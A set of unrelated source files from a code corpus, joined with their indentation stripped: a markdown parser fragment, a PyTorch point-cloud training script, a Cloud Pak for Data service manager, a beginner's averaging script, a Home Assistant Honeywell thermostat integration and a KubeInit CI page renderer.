[[Ruler]] instance. Keep configuration of block rules.
"""
def __init__(self):
self.ruler = Ruler()
for data in _rules:
name = data[0]
rule = data[1]
self.ruler.push(name, rule, {"alt": data[2] if len(data) > 2 else []})
def tokenize(
self, state: StateBlock, startLine: int, endLine: int, silent: bool = False
) -> None:
"""Generate tokens for input range."""
rules = self.ruler.getRules("")
line = startLine
maxNesting = state.md.options.maxNesting
hasEmptyLines = False
while line < endLine:
state.line = line = state.skipEmptyLines(line)
if line >= endLine:
break
if state.sCount[line] < state.blkIndent:
# Termination condition for nested calls.
# Nested calls currently used for blockquotes & lists
break
if state.level >= maxNesting:
# If nesting level exceeded - skip tail to the end.
# That's not ordinary situation and we should not care about content.
state.line = endLine
break
# Try all possible rules.
# On success, rule should:
# - update `state.line`
# - update `state.tokens`
# - return True
for rule in rules:
if rule(state, line, endLine, False):
break
# set state.tight if we had an empty line before current tag
# i.e. latest empty line should not count
state.tight = not hasEmptyLines
# paragraph might "eat" one newline after it in nested lists
if state.isEmpty(state.line - 1):
hasEmptyLines = True
line = state.line
if line < endLine and state.isEmpty(line):
hasEmptyLines = True
line += 1
state.line = line
def parse(
self,
src: str,
md,
env,
outTokens: List[Token],
ords: Optional[Tuple[int, ...]] = None,
) -> Optional[List[Token]]:
"""Process input string and push block tokens into `outTokens`."""
if not src:
return None
state = StateBlock(src, md, env, outTokens, ords)
self.tokenize(state, state.line, state.lineMax)
return state.tokens
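# Rough usage sketch (this module ships with markdown-it-py; the import path
# below is the usual public entry point and is assumed here):
#
#     from markdown_it import MarkdownIt
#     tokens = MarkdownIt().parse("# Heading\n\nparagraph")
#     # MarkdownIt drives ParserBlock.parse/tokenize internally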
|
the-stack_106_23340 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import math
import shutil
import time
import argparse
import pprint
import random as pyrandom
import logging
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.backends.cudnn as cudnn
import torchvision
import pickle
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.dirname(BASE_DIR)
sys.path.append(ROOT_DIR)
from configs.config import cfg
from configs.config import merge_cfg_from_file
from configs.config import merge_cfg_from_list
from configs.config import assert_and_infer_cfg
from utils.training_states import TrainingStates
from utils.utils import get_accuracy, AverageMeter, import_from_file, get_logger
from datasets.dataset_info import DATASET_INFO
def parse_args():
parser = argparse.ArgumentParser(
description='Train a network with Detectron'
)
parser.add_argument(
'--cfg',
dest='cfg_file',
help='Config file for training (and optionally testing)',
default=None,
type=str
)
parser.add_argument(
'opts',
help='See configs/config.py for all options',
default=None,
nargs=argparse.REMAINDER
)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
return parser.parse_args()
def set_random_seed(seed=3):
pyrandom.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
def set_module_bn_momentum(model, momentum=0.1):
def set_bn_momentum(m):
classname = m.__class__.__name__
if classname.find('BatchNorm') != -1:
m.momentum = momentum
model.apply(set_bn_momentum)
def get_bn_decay(epoch):
    # BN momentum decays from BN_INIT_DECAY down to BN_DECAY_CLIP
BN_INIT_DECAY = 0.1
BN_DECAY_RATE = 0.5
BN_DECAY_STEP = cfg.TRAIN.LR_STEPS
BN_DECAY_CLIP = 0.01
bn_momentum = max(BN_INIT_DECAY * BN_DECAY_RATE ** (epoch // BN_DECAY_STEP), BN_DECAY_CLIP)
return bn_momentum
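# Example of the intended schedule (assuming a scalar BN_DECAY_STEP of 20;
# note cfg.TRAIN.LR_STEPS may be a list elsewhere in this config, in which
# case the integer division above would need a single step value):
# epochs 0-19 -> 0.1, 20-39 -> 0.05, 40-59 -> 0.025, ... clipped at 0.01.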
def train(data_loader, model, optimizer, lr_scheduler, epoch, logger=None):
data_time_meter = AverageMeter()
batch_time_meter = AverageMeter()
model.train()
MIN_LR = cfg.TRAIN.MIN_LR
lr_scheduler.step(epoch)
if MIN_LR > 0:
if lr_scheduler.get_lr()[0] < MIN_LR:
for param_group in optimizer.param_groups:
param_group['lr'] = MIN_LR
cur_lr = optimizer.param_groups[0]['lr']
# cur_mom = get_bn_decay(epoch)
# set_module_bn_momentum(model, cur_mom)
tic = time.time()
loader_size = len(data_loader)
training_states = TrainingStates()
for i, (data_dicts) in enumerate(data_loader):
data_time_meter.update(time.time() - tic)
batch_size = data_dicts['point_cloud'].shape[0]
data_dicts_var = {key: value.cuda() for key, value in data_dicts.items()}
optimizer.zero_grad()
losses, metrics = model(data_dicts_var)
loss = losses['total_loss']
loss = loss.mean()
loss.backward()
optimizer.step()
# mean for multi-gpu setting
losses_reduce = {key: value.detach().mean().item() for key, value in losses.items()}
metrics_reduce = {key: value.detach().mean().item() for key, value in metrics.items()}
training_states.update_states(dict(**losses_reduce, **metrics_reduce), batch_size)
batch_time_meter.update(time.time() - tic)
tic = time.time()
if (i + 1) % cfg.disp == 0 or (i + 1) == loader_size:
states = training_states.get_states(avg=False)
states_str = training_states.format_states(states)
output_str = 'Train Epoch: {:03d} [{:04d}/{}] lr:{:.6f} Time:{:.3f}/{:.3f} ' \
.format(epoch + 1, i + 1, len(data_loader), cur_lr, data_time_meter.val, batch_time_meter.val)
logging.info(output_str + states_str)
if (i + 1) == loader_size:
states = training_states.get_states(avg=True)
states_str = training_states.format_states(states)
output_str = 'Train Epoch(AVG): {:03d} [{:04d}/{}] lr:{:.6f} Time:{:.3f}/{:.3f} ' \
.format(epoch + 1, i + 1, len(data_loader), cur_lr, data_time_meter.val, batch_time_meter.val)
logging.info(output_str + states_str)
if logger is not None:
states = training_states.get_states(avg=True)
for tag, value in states.items():
logger.scalar_summary(tag, value, int(epoch))
def validate(data_loader, model, epoch, logger=None):
data_time_meter = AverageMeter()
batch_time_meter = AverageMeter()
model.eval()
tic = time.time()
loader_size = len(data_loader)
training_states = TrainingStates()
for i, (data_dicts) in enumerate(data_loader):
data_time_meter.update(time.time() - tic)
batch_size = data_dicts['point_cloud'].shape[0]
with torch.no_grad():
data_dicts_var = {key: value.cuda() for key, value in data_dicts.items()}
losses, metrics = model(data_dicts_var)
# mean for multi-gpu setting
losses_reduce = {key: value.detach().mean().item() for key, value in losses.items()}
metrics_reduce = {key: value.detach().mean().item() for key, value in metrics.items()}
training_states.update_states(dict(**losses_reduce, **metrics_reduce), batch_size)
batch_time_meter.update(time.time() - tic)
tic = time.time()
states = training_states.get_states(avg=True)
states_str = training_states.format_states(states)
output_str = 'Validation Epoch: {:03d} Time:{:.3f}/{:.3f} ' \
.format(epoch + 1, data_time_meter.val, batch_time_meter.val)
logging.info(output_str + states_str)
if logger is not None:
for tag, value in states.items():
logger.scalar_summary(tag, value, int(epoch))
return states['IoU_' + str(cfg.IOU_THRESH)]
def main():
# parse arguments
args = parse_args()
if args.cfg_file is not None:
merge_cfg_from_file(args.cfg_file)
if args.opts is not None:
merge_cfg_from_list(args.opts)
assert_and_infer_cfg()
if not os.path.exists(cfg.OUTPUT_DIR):
os.makedirs(cfg.OUTPUT_DIR)
# set logger
cfg_name = os.path.basename(args.cfg_file).split('.')[0]
log_file = '{}_{}_train.log'.format(cfg_name, time.strftime('%Y-%m-%d-%H-%M'))
log_file = os.path.join(cfg.OUTPUT_DIR, log_file)
logger = get_logger(log_file)
logger.info(pprint.pformat(args))
logger.info('config:\n {}'.format(pprint.pformat(cfg)))
# set visualize logger
logger_train = None
logger_val = None
if cfg.USE_TFBOARD:
from utils.logger import Logger
logger_dir = os.path.join(cfg.OUTPUT_DIR, 'tb_logger', 'train')
if not os.path.exists(logger_dir):
os.makedirs(logger_dir)
logger_train = Logger(logger_dir)
logger_dir = os.path.join(cfg.OUTPUT_DIR, 'tb_logger', 'val')
if not os.path.exists(logger_dir):
os.makedirs(logger_dir)
logger_val = Logger(logger_dir)
# import dataset
set_random_seed()
logging.info(cfg.DATA.FILE)
dataset_def = import_from_file(cfg.DATA.FILE)
collate_fn = dataset_def.collate_fn
dataset_def = dataset_def.ProviderDataset
train_dataset = dataset_def(
cfg.DATA.NUM_SAMPLES,
split=cfg.TRAIN.DATASET,
one_hot=True,
random_flip=True,
random_shift=True,
extend_from_det=cfg.DATA.EXTEND_FROM_DET)
train_loader = torch.utils.data.DataLoader(
train_dataset,
batch_size=cfg.TRAIN.BATCH_SIZE,
shuffle=True,
num_workers=cfg.NUM_WORKERS,
pin_memory=True,
drop_last=True,
collate_fn=collate_fn)
val_dataset = dataset_def(
cfg.DATA.NUM_SAMPLES,
split=cfg.TEST.DATASET,
one_hot=True,
random_flip=False,
random_shift=False,
extend_from_det=cfg.DATA.EXTEND_FROM_DET)
val_loader = torch.utils.data.DataLoader(
val_dataset,
batch_size=cfg.TEST.BATCH_SIZE,
shuffle=False,
num_workers=cfg.NUM_WORKERS,
pin_memory=True,
drop_last=False,
collate_fn=collate_fn)
logging.info('training: sample {} / batch {} '.format(len(train_dataset), len(train_loader)))
logging.info('validation: sample {} / batch {} '.format(len(val_dataset), len(val_loader)))
logging.info(cfg.MODEL.FILE)
model_def = import_from_file(cfg.MODEL.FILE)
model_def = model_def.PointNetDet
input_channels = 3 if not cfg.DATA.WITH_EXTRA_FEAT else cfg.DATA.EXTRA_FEAT_DIM
# NUM_VEC = 0 if cfg.DATA.CAR_ONLY else 3
dataset_name = cfg.DATA.DATASET_NAME
assert dataset_name in DATASET_INFO
    dataset_category_info = DATASET_INFO[dataset_name]
    NUM_VEC = len(dataset_category_info.CLASSES)  # rgb category as extra feature vector
NUM_CLASSES = cfg.MODEL.NUM_CLASSES
model = model_def(input_channels, num_vec=NUM_VEC, num_classes=NUM_CLASSES)
logging.info(pprint.pformat(model))
if cfg.NUM_GPUS > 1:
model = torch.nn.DataParallel(model)
model = model.cuda()
parameters_size = 0
for p in model.parameters():
parameters_size += p.numel()
logging.info('parameters: %d' % parameters_size)
logging.info('using optimizer method {}'.format(cfg.TRAIN.OPTIMIZER))
if cfg.TRAIN.OPTIMIZER == 'adam':
optimizer = optim.Adam(model.parameters(), lr=cfg.TRAIN.BASE_LR,
betas=(0.9, 0.999), weight_decay=cfg.TRAIN.WEIGHT_DECAY)
elif cfg.TRAIN.OPTIMIZER == 'sgd':
optimizer = optim.SGD(model.parameters(), lr=cfg.TRAIN.BASE_LR,
momentum=cfg.TRAIN.MOMENTUM, weight_decay=cfg.TRAIN.WEIGHT_DECAY)
else:
assert False, 'Not support now.'
# miles = [math.ceil(num_epochs*3/8), math.ceil(num_epochs*6/8)]
# assert isinstance(LR_SETP, list)
LR_STEPS = cfg.TRAIN.LR_STEPS
LR_DECAY = cfg.TRAIN.GAMMA
if len(LR_STEPS) > 1:
lr_scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=LR_STEPS, gamma=LR_DECAY)
else:
lr_scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=LR_STEPS[0], gamma=LR_DECAY)
best_prec1 = 0
best_epoch = 0
start_epoch = 0
# optionally resume from a checkpoint
if cfg.RESUME:
if os.path.isfile(cfg.TRAIN.WEIGHTS):
checkpoint = torch.load(cfg.TRAIN.WEIGHTS)
start_epoch = checkpoint['epoch']
best_prec1 = checkpoint['best_prec1']
best_epoch = checkpoint['best_epoch']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
logger.info("=> loaded checkpoint '{}' (epoch {})".format(cfg.TRAIN.WEIGHTS, checkpoint['epoch']))
else:
logger.error("=> no checkpoint found at '{}'".format(cfg.TRAIN.WEIGHTS))
# resume from other pretrained model
if start_epoch == cfg.TRAIN.MAX_EPOCH:
start_epoch = 0
best_prec1 = 0
best_epoch = 0
if cfg.EVAL_MODE:
validate(val_loader, model, start_epoch, logger_val)
return
MAX_EPOCH = cfg.TRAIN.MAX_EPOCH
for n in range(start_epoch, MAX_EPOCH):
train(train_loader, model, optimizer, lr_scheduler, n, logger_train)
ious_gt = validate(val_loader, model, n, logger_val)
prec1 = ious_gt
is_best = False
if prec1 > best_prec1:
best_prec1 = prec1
best_epoch = n + 1
is_best = True
logging.info('Best model {:04d}, Validation Accuracy {:.6f}'.format(best_epoch, best_prec1))
save_data = {
'epoch': n + 1,
'state_dict': model.state_dict() if cfg.NUM_GPUS == 1 else model.module.state_dict(),
'optimizer': optimizer.state_dict(),
'best_prec1': best_prec1,
'best_epoch': best_epoch
}
if (n + 1) % 5 == 0 or (n + 1) == MAX_EPOCH:
torch.save(save_data, os.path.join(cfg.OUTPUT_DIR, 'model_%04d.pth' % (n + 1)))
if is_best:
torch.save(save_data, os.path.join(cfg.OUTPUT_DIR, 'model_best.pth'))
if (n + 1) == MAX_EPOCH:
torch.save(save_data, os.path.join(cfg.OUTPUT_DIR, 'model_final.pth'))
logging.info('Best model {:04d}, Validation Accuracy {:.6f}'.format(best_epoch, best_prec1))
if __name__ == '__main__':
main()
|
the-stack_106_23341 | # Copyright 2021, 2022 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from typing import Dict
import cpo.config
from cpo.lib.cloud_pak_for_data.cpd_4_0_0.types.cloud_pak_for_data_service_license import CloudPakForDataServiceLicense
from cpo.lib.cloud_pak_for_data.cpd_4_0_0.types.custom_resource_metadata import CustomResourceMetadata
from cpo.lib.cloud_pak_for_data.cpd_4_0_0.types.subscription_metadata import (
SubscriptionMetadata,
SubscriptionMetadataSpec,
)
from cpo.lib.error import DataGateCLIException
class CloudPakForDataServiceManager:
"""Manages IBM Cloud Pak for Data operator subscriptions and custom
resources"""
def __init__(self):
self._custom_resources: Dict[str, CustomResourceMetadata] = {}
self._subscriptions: Dict[str, SubscriptionMetadata] = {}
def get_custom_resource_metadata(self, service_name: str) -> CustomResourceMetadata:
"""Returns custom resource metadata for the given service name
Parameters
----------
service_name
name of the service for which custom resource metadata shall be returned
Returns
-------
CustomResourceMetadata
custom resource metadata object
"""
self._initialize_custom_resources_dict_if_required()
if service_name not in self._custom_resources:
raise DataGateCLIException("Unknown IBM Cloud Pak for Data service")
return self._custom_resources[service_name]
def get_custom_resource_metadata_dict(self) -> Dict[str, CustomResourceMetadata]:
"""Returns custom resource metadata for all services
Returns
-------
Dict[str, CustomResourceMetadata]
dictionary mapping service names to custom resource metadata objects
"""
self._initialize_custom_resources_dict_if_required()
return self._custom_resources
def get_subscription_metadata(self, operator_name: str) -> SubscriptionMetadata:
"""Returns subscription metadata for the given operator name
Parameters
----------
operator_name
name of the operator for which subscription metadata shall be returned
Returns
-------
SubscriptionMetadata
subscription metadata object
"""
self._initialize_subscriptions_dict_if_required()
if operator_name not in self._subscriptions:
raise DataGateCLIException("Unknown IBM Cloud Pak for Data service")
return self._subscriptions[operator_name]
def get_subscription_metadata_dict_for_cloud_pak_for_data_services(self) -> Dict[str, SubscriptionMetadata]:
"""Returns subscription metadata for all operators
Returns
-------
Dict[str, SubscriptionMetadata]
dictionary mapping operator names to subscription metadata objects
"""
self._initialize_subscriptions_dict_if_required()
return dict(filter(lambda element: element[1].service, self._subscriptions.items()))
def is_cloud_pak_for_data_service(self, service_name: str):
"""Returns whether there is an IBM Cloud Pak for Data service with the
given name
Parameters
----------
service_name
name of the service to be checked
Returns
-------
bool
true, if there is an IBM Cloud Pak for Data service with the given name
"""
self._initialize_custom_resources_dict_if_required()
return service_name in self._custom_resources
def _initialize_custom_resources_dict_if_required(self):
if len(self._custom_resources) == 0:
with open(
cpo.config.configuration_manager.get_deps_directory_path() / "config" / "cpd-custom-resources.json"
) as json_file:
for key, value in json.load(json_file).items():
self._custom_resources[key] = CustomResourceMetadata(
description=value["description"],
group=value["group"],
kind=value["kind"],
licenses=list(map(lambda license: CloudPakForDataServiceLicense[license], value["licenses"])),
name=value["name"],
operator_name=value["operator_name"],
spec=value["spec"],
status_key_name=value["status_key_name"],
storage_option_required=value["storage_option_required"],
version=value["version"],
)
def _initialize_subscriptions_dict_if_required(self):
if len(self._subscriptions) == 0:
with open(
cpo.config.configuration_manager.get_deps_directory_path() / "config" / "cpd-subscriptions.json"
) as json_file:
for key, value in json.load(json_file).items():
self._subscriptions[key] = SubscriptionMetadata(
dependencies=value["dependencies"],
labels=value["labels"],
name=value["name"],
operand_request_dependencies=value["operand_request_dependencies"],
required_namespace=value["required_namespace"],
service=value["service"],
spec=SubscriptionMetadataSpec(
channel=value["spec"]["channel"],
name=value["spec"]["name"],
),
)
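# Minimal usage sketch (illustrative only; the service name is a placeholder
# and may not exist in the bundled JSON configuration files):
#
#     manager = CloudPakForDataServiceManager()
#     if manager.is_cloud_pak_for_data_service("db2oltp"):
#         metadata = manager.get_custom_resource_metadata("db2oltp")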
|
the-stack_106_23343 | # Write a program that reads 5 numbers and reports their sum and average.
soma = 0
media = 0
contador = 0
for i in range(5):
    n = float(input("Enter a number: "))
    soma = soma + n
    contador = contador + 1
media = soma / contador
print('The sum is:', soma)
print("The average is:", media)
|
the-stack_106_23345 | """
Support for Honeywell Round Connected and Honeywell Evohome thermostats.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/climate.honeywell/
"""
import logging
import socket
import datetime
import requests
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.climate import (
ClimateDevice, PLATFORM_SCHEMA, ATTR_FAN_MODE, ATTR_FAN_LIST,
ATTR_OPERATION_MODE, ATTR_OPERATION_LIST, SUPPORT_TARGET_TEMPERATURE,
SUPPORT_AWAY_MODE, SUPPORT_OPERATION_MODE)
from homeassistant.const import (
CONF_PASSWORD, CONF_USERNAME, TEMP_CELSIUS, TEMP_FAHRENHEIT,
ATTR_TEMPERATURE, CONF_REGION)
REQUIREMENTS = ['evohomeclient==0.2.5', 'somecomfort==0.5.2']
_LOGGER = logging.getLogger(__name__)
ATTR_FAN = 'fan'
ATTR_SYSTEM_MODE = 'system_mode'
ATTR_CURRENT_OPERATION = 'equipment_output_status'
CONF_AWAY_TEMPERATURE = 'away_temperature'
CONF_COOL_AWAY_TEMPERATURE = 'away_cool_temperature'
CONF_HEAT_AWAY_TEMPERATURE = 'away_heat_temperature'
DEFAULT_AWAY_TEMPERATURE = 16
DEFAULT_COOL_AWAY_TEMPERATURE = 30
DEFAULT_HEAT_AWAY_TEMPERATURE = 16
DEFAULT_REGION = 'eu'
REGIONS = ['eu', 'us']
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(CONF_AWAY_TEMPERATURE,
default=DEFAULT_AWAY_TEMPERATURE): vol.Coerce(float),
vol.Optional(CONF_COOL_AWAY_TEMPERATURE,
default=DEFAULT_COOL_AWAY_TEMPERATURE): vol.Coerce(float),
vol.Optional(CONF_HEAT_AWAY_TEMPERATURE,
default=DEFAULT_HEAT_AWAY_TEMPERATURE): vol.Coerce(float),
vol.Optional(CONF_REGION, default=DEFAULT_REGION): vol.In(REGIONS),
})
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the Honeywell thermostat."""
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
region = config.get(CONF_REGION)
if region == 'us':
return _setup_us(username, password, config, add_devices)
return _setup_round(username, password, config, add_devices)
def _setup_round(username, password, config, add_devices):
"""Set up the rounding function."""
from evohomeclient import EvohomeClient
away_temp = config.get(CONF_AWAY_TEMPERATURE)
evo_api = EvohomeClient(username, password)
try:
zones = evo_api.temperatures(force_refresh=True)
for i, zone in enumerate(zones):
add_devices(
[RoundThermostat(evo_api, zone['id'], i == 0, away_temp)],
True
)
except socket.error:
_LOGGER.error(
"Connection error logging into the honeywell evohome web service")
return False
return True
# config will be used later
def _setup_us(username, password, config, add_devices):
"""Set up the user."""
import somecomfort
try:
client = somecomfort.SomeComfort(username, password)
except somecomfort.AuthError:
_LOGGER.error("Failed to login to honeywell account %s", username)
return False
except somecomfort.SomeComfortError as ex:
_LOGGER.error("Failed to initialize honeywell client: %s", str(ex))
return False
dev_id = config.get('thermostat')
loc_id = config.get('location')
cool_away_temp = config.get(CONF_COOL_AWAY_TEMPERATURE)
heat_away_temp = config.get(CONF_HEAT_AWAY_TEMPERATURE)
add_devices([HoneywellUSThermostat(client, device, cool_away_temp,
heat_away_temp, username, password)
for location in client.locations_by_id.values()
for device in location.devices_by_id.values()
if ((not loc_id or location.locationid == loc_id) and
(not dev_id or device.deviceid == dev_id))])
return True
class RoundThermostat(ClimateDevice):
"""Representation of a Honeywell Round Connected thermostat."""
def __init__(self, client, zone_id, master, away_temp):
"""Initialize the thermostat."""
self.client = client
self._current_temperature = None
self._target_temperature = None
self._name = 'round connected'
self._id = zone_id
self._master = master
self._is_dhw = False
self._away_temp = away_temp
self._away = False
@property
def supported_features(self):
"""Return the list of supported features."""
supported = (SUPPORT_TARGET_TEMPERATURE | SUPPORT_AWAY_MODE)
if hasattr(self.client, ATTR_SYSTEM_MODE):
supported |= SUPPORT_OPERATION_MODE
return supported
@property
def name(self):
"""Return the name of the honeywell, if any."""
return self._name
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return TEMP_CELSIUS
@property
def current_temperature(self):
"""Return the current temperature."""
return self._current_temperature
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
if self._is_dhw:
return None
return self._target_temperature
def set_temperature(self, **kwargs):
"""Set new target temperature."""
temperature = kwargs.get(ATTR_TEMPERATURE)
if temperature is None:
return
self.client.set_temperature(self._name, temperature)
@property
def current_operation(self) -> str:
"""Get the current operation of the system."""
return getattr(self.client, ATTR_SYSTEM_MODE, None)
@property
def is_away_mode_on(self):
"""Return true if away mode is on."""
return self._away
def set_operation_mode(self, operation_mode: str) -> None:
"""Set the HVAC mode for the thermostat."""
if hasattr(self.client, ATTR_SYSTEM_MODE):
self.client.system_mode = operation_mode
def turn_away_mode_on(self):
"""Turn away on.
Honeywell does have a proprietary away mode, but it doesn't really work
the way it should. For example: If you set a temperature manually
it doesn't get overwritten when away mode is switched on.
"""
self._away = True
self.client.set_temperature(self._name, self._away_temp)
def turn_away_mode_off(self):
"""Turn away off."""
self._away = False
self.client.cancel_temp_override(self._name)
def update(self):
"""Get the latest date."""
try:
# Only refresh if this is the "master" device,
# others will pick up the cache
for val in self.client.temperatures(force_refresh=self._master):
if val['id'] == self._id:
data = val
except KeyError:
_LOGGER.error("Update failed from Honeywell server")
self.client.user_data = None
return
except StopIteration:
_LOGGER.error("Did not receive any temperature data from the "
"evohomeclient API")
return
self._current_temperature = data['temp']
self._target_temperature = data['setpoint']
if data['thermostat'] == 'DOMESTIC_HOT_WATER':
self._name = 'Hot Water'
self._is_dhw = True
else:
self._name = data['name']
self._is_dhw = False
# The underlying library doesn't expose the thermostat's mode
# but we can pull it out of the big dictionary of information.
device = self.client.devices[self._id]
self.client.system_mode = device[
'thermostat']['changeableValues']['mode']
class HoneywellUSThermostat(ClimateDevice):
"""Representation of a Honeywell US Thermostat."""
def __init__(self, client, device, cool_away_temp,
heat_away_temp, username, password):
"""Initialize the thermostat."""
self._client = client
self._device = device
self._cool_away_temp = cool_away_temp
self._heat_away_temp = heat_away_temp
self._away = False
self._username = username
self._password = password
@property
def supported_features(self):
"""Return the list of supported features."""
supported = (SUPPORT_TARGET_TEMPERATURE | SUPPORT_AWAY_MODE)
if hasattr(self._device, ATTR_SYSTEM_MODE):
supported |= SUPPORT_OPERATION_MODE
return supported
@property
def is_fan_on(self):
"""Return true if fan is on."""
return self._device.fan_running
@property
def name(self):
"""Return the name of the honeywell, if any."""
return self._device.name
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return (TEMP_CELSIUS if self._device.temperature_unit == 'C'
else TEMP_FAHRENHEIT)
@property
def current_temperature(self):
"""Return the current temperature."""
return self._device.current_temperature
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
if self._device.system_mode == 'cool':
return self._device.setpoint_cool
return self._device.setpoint_heat
@property
def current_operation(self) -> str:
"""Return current operation ie. heat, cool, idle."""
oper = getattr(self._device, ATTR_CURRENT_OPERATION, None)
if oper == "off":
oper = "idle"
return oper
def set_temperature(self, **kwargs):
"""Set target temperature."""
temperature = kwargs.get(ATTR_TEMPERATURE)
if temperature is None:
return
import somecomfort
try:
# Get current mode
mode = self._device.system_mode
# Set hold if this is not the case
if getattr(self._device, "hold_{}".format(mode)) is False:
# Get next period key
next_period_key = '{}NextPeriod'.format(mode.capitalize())
# Get next period raw value
next_period = self._device.raw_ui_data.get(next_period_key)
# Get next period time
hour, minute = divmod(next_period * 15, 60)
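                # (comment added for clarity) The raw value appears to count
                # 15-minute slots, so slot * 15 gives minutes, split into an
                # hour/minute pair for the hold time below.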
# Set hold time
setattr(self._device,
"hold_{}".format(mode),
datetime.time(hour, minute))
# Set temperature
setattr(self._device,
"setpoint_{}".format(mode),
temperature)
except somecomfort.SomeComfortError:
_LOGGER.error("Temperature %.1f out of range", temperature)
@property
def device_state_attributes(self):
"""Return the device specific state attributes."""
import somecomfort
data = {
ATTR_FAN: (self.is_fan_on and 'running' or 'idle'),
ATTR_FAN_MODE: self._device.fan_mode,
ATTR_OPERATION_MODE: self._device.system_mode,
}
data[ATTR_FAN_LIST] = somecomfort.FAN_MODES
data[ATTR_OPERATION_LIST] = somecomfort.SYSTEM_MODES
return data
@property
def is_away_mode_on(self):
"""Return true if away mode is on."""
return self._away
def turn_away_mode_on(self):
"""Turn away on.
Somecomfort does have a proprietary away mode, but it doesn't really
work the way it should. For example: If you set a temperature manually
it doesn't get overwritten when away mode is switched on.
"""
self._away = True
import somecomfort
try:
# Get current mode
mode = self._device.system_mode
except somecomfort.SomeComfortError:
_LOGGER.error('Can not get system mode')
return
try:
# Set permanent hold
setattr(self._device,
"hold_{}".format(mode),
True)
# Set temperature
setattr(self._device,
"setpoint_{}".format(mode),
getattr(self, "_{}_away_temp".format(mode)))
except somecomfort.SomeComfortError:
_LOGGER.error('Temperature %.1f out of range',
getattr(self, "_{}_away_temp".format(mode)))
def turn_away_mode_off(self):
"""Turn away off."""
self._away = False
import somecomfort
try:
# Disabling all hold modes
self._device.hold_cool = False
self._device.hold_heat = False
except somecomfort.SomeComfortError:
_LOGGER.error('Can not stop hold mode')
def set_operation_mode(self, operation_mode: str) -> None:
"""Set the system mode (Cool, Heat, etc)."""
if hasattr(self._device, ATTR_SYSTEM_MODE):
self._device.system_mode = operation_mode
def update(self):
"""Update the state."""
import somecomfort
retries = 3
while retries > 0:
try:
self._device.refresh()
break
except (somecomfort.client.APIRateLimited, OSError,
requests.exceptions.ReadTimeout) as exp:
retries -= 1
if retries == 0:
raise exp
if not self._retry():
raise exp
_LOGGER.error(
"SomeComfort update failed, Retrying - Error: %s", exp)
def _retry(self):
"""Recreate a new somecomfort client.
When we got an error, the best way to be sure that the next query
will succeed, is to recreate a new somecomfort client.
"""
import somecomfort
try:
self._client = somecomfort.SomeComfort(
self._username, self._password)
except somecomfort.AuthError:
_LOGGER.error("Failed to login to honeywell account %s",
self._username)
return False
except somecomfort.SomeComfortError as ex:
_LOGGER.error("Failed to initialize honeywell client: %s",
str(ex))
return False
devices = [device
for location in self._client.locations_by_id.values()
for device in location.devices_by_id.values()
if device.name == self._device.name]
if len(devices) != 1:
_LOGGER.error("Failed to find device %s", self._device.name)
return False
self._device = devices[0]
return True
|
the-stack_106_23346 | #!/bin/python3
"""
Copyright kubeinit contributors.
Licensed under the Apache License, Version 2.0 (the "License"); you may
not use this file except in compliance with the License. You may obtain
a copy of the License at:
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations
under the License.
"""
import os
import re
from jinja2 import Environment, FileSystemLoader
from kubeinit_ci_utils import get_periodic_jobs_labels
def main():
"""Run the main method."""
labels = get_periodic_jobs_labels()
jobs = []
for label in labels:
if re.match(r"[a-z|0-9|\.]+-[a-z]+-\d+-\d+-\d+-[c|h]", label):
print("'render_periodic_jobs_page.py' ==> Matching a periodic job label")
params = label.split("-")
distro = params[0]
driver = params[1]
masters = params[2]
workers = params[3]
hypervisors = params[4]
launch_from = params[5]
if distro == 'okd':
distro = "Origin Distribution of K8s"
elif distro == 'kid':
distro = "KubeInit distro"
elif distro == 'eks':
distro = "Amazon EKS Distro"
elif distro == 'rke':
distro = "Rancher K8s Engine"
elif distro == 'cdk':
distro = "Canonical Distribution of K8s"
elif distro == 'k8s':
distro = "Vanilla K8s"
elif '.' in distro:
distro = distro.upper().replace('.', '/')
if launch_from == 'h':
launch_from = "Host"
elif launch_from == 'c':
launch_from = "Container"
else:
print("'render_periodic_jobs_page.py' ==> This label do not match")
print(label)
raise Exception("'render_periodic_jobs_page.py' ==> This label do not match: %s" % (label))
jobs.append({'distro': distro,
'driver': driver,
'masters': masters,
'workers': workers,
'hypervisors': hypervisors,
'launch_from': launch_from,
'url': "<a href='https://storage.googleapis.com/kubeinit-ci/jobs/" + label + "-periodic-pid-weekly-u/index.html'><img height='20px' src='https://storage.googleapis.com/kubeinit-ci/jobs/" + label + "-periodic-pid-weekly-u/badge_status.svg'/></a>"})
path = os.path.join(os.path.dirname(__file__))
file_loader = FileSystemLoader(searchpath=path)
env = Environment(loader=file_loader)
template_index = "periodic_jobs.md.j2"
print("'render_periodic_jobs_page.py' ==> The path for the template is: " + path)
template = env.get_template(template_index)
output = template.render(jobs=jobs)
with open("periodic_jobs.md", "w+") as text_file:
text_file.write(output)
